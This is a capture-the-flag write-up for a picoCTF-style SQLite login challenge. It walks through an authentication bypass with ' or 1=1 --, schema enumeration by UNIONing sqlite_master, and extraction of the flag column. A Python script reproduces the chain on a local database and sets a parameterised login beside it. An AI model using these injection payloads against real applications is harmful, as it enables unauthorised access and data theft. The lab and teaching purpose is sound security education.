Description
Can you find the flag on this website?
Additional details will be available after launching your challenge instance.
Hints
SQLiLite
First log in with any username and password; the response shows the SQL query the server ran. The next step is to craft input that changes that query so the password check is bypassed and the login succeeds.
-- username: admin
-- password: 123
SQL query: SELECT id FROM users WHERE password = '123' AND username = 'admin'
The password predicate comes before the username predicate in the WHERE clause, so the password field is the one to inject into: anything after it, including the username check, can be commented out.
Use ' or 1=1 --
The resulting SQL looks like this; try it:
-- username: admin (anything works)
-- password: ' or 1=1 --
SELECT id FROM users WHERE password = '' or 1=1 --' AND username = 'admin'
The leading quote closes the password string literal, or 1=1 makes the predicate true for every row, and -- turns the rest of the line (the closing quote and the username check) into a comment, so the query returns the first user's id.
After logging in we reach the following page (screenshot).
Entering a name and searching suggests the underlying query is roughly:
SELECT name, address, phone FROM table_name WHERE name = '';
The hint says the backend is SQLite. SQLite stores its schema in a table called sqlite_master, whose sql column holds the CREATE statement of every table and index. UNIONing it onto the search query lists every table together with its columns. The search query returns three columns (name, address, phone), so the UNIONed SELECT must also return exactly three; the literal 1 pads the third column:
' UNION SELECT name, sql, 1 FROM sqlite_master; --
SELECT name, address, phone FROM table_name WHERE name = '' UNION SELECT name, sql, 1 FROM sqlite_master;--';
The output (screenshot above) reveals a table more_table with a flag column. Query it through the same UNION to read the flag:
' UNION SELECT 0, flag, 1 FROM more_table; --
SELECT name, address, phone FROM table_name WHERE name = '' UNION SELECT 0, flag, 1 FROM more_table; -- ';
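The whole chain (login bypass, schema enumeration through sqlite_master, flag extraction) reproduced against an in-memory SQLite database, as an added example that is not part of the original writeup or the challenge source. The table and column names and the query shapes are taken from the writeup; the row contents and the flag value are constructed, and the vulnerable functions are my guess at how the challenge builds its queries. The trailing ; in the writeup's UNION payloads is unnecessary and is omitted here. A parameterised login is included beside the vulnerable one to show the same payload failing against bound parameters.

```python
import sqlite3

# Constructed placeholder; the real flag is not on the page.
FLAG = "picoCTF{constructed_example_flag}"


def build_db() -> sqlite3.Connection:
    """In-memory database mirroring the schema the writeup infers (contents invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 'secret-not-123');
        CREATE TABLE table_name (name TEXT, address TEXT, phone TEXT);
        INSERT INTO table_name VALUES ('Alice', '1 Example St', '555-0100');
        CREATE TABLE more_table (flag TEXT);
        """
    )
    conn.execute("INSERT INTO more_table VALUES (?)", (FLAG,))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Assumed login: query built by string formatting, password predicate first.
    Returns the matched user id, or None."""
    query = (f"SELECT id FROM users WHERE password = '{password}' "
             f"AND username = '{username}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE password = ? AND username = ?",
        (password, username),
    ).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, name):
    """Assumed search endpoint: the three-column query the writeup shows."""
    query = f"SELECT name, address, phone FROM table_name WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def enumerate_schema(conn):
    """UNION the search with sqlite_master; the literal 1 pads the third column.
    Returns {object name: CREATE statement}."""
    payload = "' UNION SELECT name, sql, 1 FROM sqlite_master --"
    return {name: sql for name, sql, _ in search_vulnerable(conn, payload)}


def steal_flag(conn):
    """Read more_table.flag through the same UNION; injected rows carry 0 in column 1."""
    payload = "' UNION SELECT 0, flag, 1 FROM more_table --"
    return [row[1] for row in search_vulnerable(conn, payload) if row[0] == 0]


if __name__ == "__main__":
    db = build_db()
    bypass = "' or 1=1 --"
    print("vulnerable login, bypass payload ->", login_vulnerable(db, "anything", bypass))
    print("parameterised login, same payload ->", login_safe(db, "anything", bypass))
    for name, sql in enumerate_schema(db).items():
        print(f"{name}: {sql}")
    print("flag rows:", steal_flag(db))
```

The UNION works only because the injected SELECT has the same number of columns as the original one; if the column count were unknown, the usual approach is to add columns until the database stops erroring.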